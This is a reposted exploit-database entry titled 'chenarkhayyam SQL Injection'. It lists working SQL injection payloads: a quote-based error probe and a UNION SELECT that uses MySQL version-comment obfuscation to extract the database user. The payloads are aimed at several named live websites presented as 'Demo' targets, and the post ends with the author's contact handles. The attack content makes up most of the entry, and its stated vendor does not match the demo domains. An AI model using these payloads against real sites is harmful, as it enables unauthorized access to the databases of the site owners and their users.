chenarkhayyam SQL Injection
2024-2-9 06:1:55 Author: cxsecurity.com(查看原文) 阅读量:18 收藏

chenarkhayyam SQL Injection

[+] Title: chenarkhayyam SQL Injection [+] Author: cymilad [+] Vendor Homepage: https://chenarkhayyam.com [+] Tested on: Windows 11 & Firefox [+] Category: Web Application Bugs [+] Google Dork: - --- Note --- : [1] Add the 1 quotation mark (') to the end of the link : https://mana-fit.com/detail-blod.php?id=67' [2] Union Base : https://mana-fit.com/detail-blod.php?id=-67'+/*!50000union*/+select+1,user(),3,4,5,6,7,8--+ --- Demo --- : https://persianlux.co/shop-detail.php?id=788' https://mana-fit.com/detail-blod.php?id=67' https://aria-trading.com/blog-details.php?id=71' https://www.kabinet-karan.ir/blog-details.php?id=11' --- Contact Me --- : [-] Instagram : @cymilad [-] Telegram : @cymilad [-] Twitter : @cymilad [-] Email : [email protected]



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024020038
如有侵权请联系:admin#unsafe.sh